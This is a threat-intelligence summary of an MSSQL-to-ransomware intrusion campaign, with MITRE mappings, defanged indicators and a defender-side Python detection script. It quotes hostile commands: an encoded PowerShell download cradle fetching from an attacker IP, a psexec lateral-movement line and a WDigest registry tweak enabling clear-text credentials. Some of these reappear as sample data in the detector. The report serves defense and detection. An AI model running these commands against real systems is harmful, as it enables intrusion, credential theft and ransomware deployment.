Keypoints
- Threat campaign RE#TURGENCE targeted exposed MSSQL servers via brute force to gain initial access.
- Attackers enabled/used xp_cmdshell to run encoded PowerShell that downloaded payloads from 88.214.26[.]3.
- PowerShell stages loaded a heavily obfuscated Cobalt Strike beacon configured to inject into SndVol.exe and beacon to seruvadessigen.3utilities[.]com.
- Operators deployed AnyDesk via a mounted SMB share (45.148.121[.]87), created a local admin user (username “windows”, password “denek1010”), and shifted to interactive remote control.
- Credential theft used Mimikatz (automated via start.bat and registry tweaks to enable clear-text/WDigest), then psexec with dumped domain admin credentials for lateral movement to a domain controller.
- MIMIC ransomware was manually deployed (red25.exe → red.exe), dropped Everything binaries to enumerate targets, and executed with arguments like -e ul1/ul2/watch to encrypt domain hosts.
MITRE Techniques
- [T1110] Brute Force – Used to gain initial access to exposed MSSQL servers. (‘the threat actors were able to brute force their way into the victim server’)
- [T1505.001] SQL Stored Procedures – Abuse of xp_cmdshell to execute system commands from sqlservr.exe. (‘leveraged the use of the xp_cmdshell procedure to execute commands on the host.’)
- [T1105] Ingress Tool Transfer – Downloaded PowerShell stages and binaries via HTTP from 88.214.26[.]3 and SMB shares. (‘iex((New-Object System.Net.Webclient).DownloadString('hxxp://88.214.26[.]3:25823/189Jt'))’)
- [T1059.001] Command and Scripting Interpreter: PowerShell – Encoded PowerShell invoked to retrieve and execute additional stages. (‘powershell -exec bypass -w 1 -e …’)
- [T1055] Process Injection (Cobalt Strike) – Cobalt Strike payload loaded via in-memory reflection and injected into SndVol.exe. (‘the Cobalt Strike beacon is configured to inject into the Windows-native process SndVol.exe’)
- [T1219] Remote Access Software – AnyDesk installed and used for interactive access and file transfer. (‘install the AnyDesk connector service… prints the AnyConnect client ID’)
- [T1003] OS Credential Dumping – Mimikatz executed to dump credentials and save outputs to Mimikatz_dump.txt. (‘download Mimikatz… The results of the Mimikatz dump are then saved into the Mimikatz_dump.txt file.’)
- [T1046] Network Service Discovery – Advanced Port Scanner used to enumerate remote shares, test RDP, and discover domain controllers/jumphosts. (‘Check domain controller remote shares… Test for the usage of RDP connecting to DC’)
- [T1077/T1021 (Lateral Movement via psexec)] Lateral Movement – psexec used to execute cmd.exe on a domain controller using dumped DA credentials. (‘c:\psexec.exe -u [REDACTED_DOMAIN]\[REDACTED_USER] -p [REDACTED_PASS] \\[REDACTED_IP] cmd.exe’)
- [T1486] Data Encrypted for Impact – MIMIC ransomware (red.exe) executed to encrypt files using Everything binaries for file enumeration and left a payment notice. (‘—IMPORTANT—NOTICE—.txt’)
- [T1112] Modify Registry – Registry tweak applied to enable clear text credentials for credential dumping. (‘uses a known registry tweak to enable clear text credentials’)
Indicators of Compromise
- [IP Address] C2 and payload hosting – 45.148.121[.]87 (SMB payloads/AnyDesk share), 88.214.26[.]3 (PowerShell payloads)
- [Domain] Cobalt Strike beacon – seruvadessigen.3utilities[.]com (beacon URL from Cobalt Strike config)
- [File names] Deployed/observed files – ad.bat (AnyDesk installer script), red25.exe/red.exe (MIMIC dropper and ransomware)
- [File hashes] Observed sample hashes – ad.bat: 9F3AD476EDA12875…AD3D3, red.exe: D6CD0080D401BE8A9…49DC4, and 5 more hashes
The technical kill chain began with brute forcing exposed MSSQL instances, enabling xp_cmdshell, and executing an encoded PowerShell command from sqlservr.exe to fetch stage 1 from hxxp://88.214.26[.]3:25823/189Jt. That first-stage script fetched and executed a second PowerShell stage (hxxp://88.214.26[.]3:25823/MSjku) which contained an obfuscated Cobalt Strike payload; the extracted beacon configuration shows HTTPS beaconing to seruvadessigen.3utilities[.]com and process injection targeted at SndVol.exe.
After establishing a foothold via Cobalt Strike, operators used SMB to mount a remote share on 45.148.121[.]87, copied AnyDesk (ad.exe) and an installer script (ad.bat), created a local administrative account (username “windows”, password “denek1010”), and installed AnyDesk for hands-on control. Via AnyDesk they transferred Mimikatz (into c:\users\windows\desktop\x64) and an automation batch (start.bat) that enabled clear-text/WDigest registry settings, ran credential dumps, and saved results to Mimikatz_dump.txt for credential harvesting.
Using the harvested credentials and network discovery via Advanced Port Scanner (advport.exe), the actors moved laterally with psexec to a domain controller and other hosts, then manually deployed MIMIC: red25.exe (self-extracting) dropped the Everything binaries and red.exe, which ran with arguments like -e ul1/ul2/watch to enumerate and encrypt files across the domain, producing the payment note “—IMPORTANT—NOTICE—.txt”. The observed timeline from initial MSSQL access to domain-wide MIMIC execution was approximately one month.
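As an added defender-side example (not code from the original report or from any tooling it describes), the following Python triages constructed process-creation events for three behaviours in the chain above: a shell spawned by sqlservr.exe (xp_cmdshell), an encoded PowerShell download cradle, and the WDigest registry tweak that enables clear-text credential caching. The event shapes, file paths and the encoded command are constructed for illustration; the UseLogonCredential value name is the standard WDigest setting and is not stated on the page.

```python
import base64
import re
from typing import List, Optional

# Constructed sample events in the shape of Sysmon Event ID 1 records;
# illustrative only, not telemetry from the report.
CRADLE = "iex((New-Object System.Net.Webclient).DownloadString('hxxp://88.214.26[.]3:25823/189Jt'))"

def ps_encode(script: str) -> str:
    """Build a -e argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd /c powershell -exec bypass -w 1 -e {ps_encode(CRADLE)}"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
                r" /v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
WDIGEST_RE = re.compile(r"WDigest.*UseLogonCredential.*\b1\b", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -e/-enc argument, or None if there is none or it is malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event: dict) -> List[str]:
    """Return the detection labels that fire for one process-creation event."""
    hits = []
    parent, image = event["parent"].lower(), event["image"].lower()
    if parent.endswith("sqlservr.exe") and image.endswith(("cmd.exe", "powershell.exe")):
        hits.append("sqlservr-spawned-shell")      # xp_cmdshell abuse (T1505.001)
    decoded = decode_encoded_command(event["cmdline"])
    if decoded and re.search(r"downloadstring|\biex\b|invoke-expression", decoded, re.I):
        hits.append("encoded-download-cradle")     # T1059.001 / T1105
    if WDIGEST_RE.search(event["cmdline"]):
        hits.append("wdigest-cleartext-enabled")   # T1112 ahead of credential dumping
    return hits
```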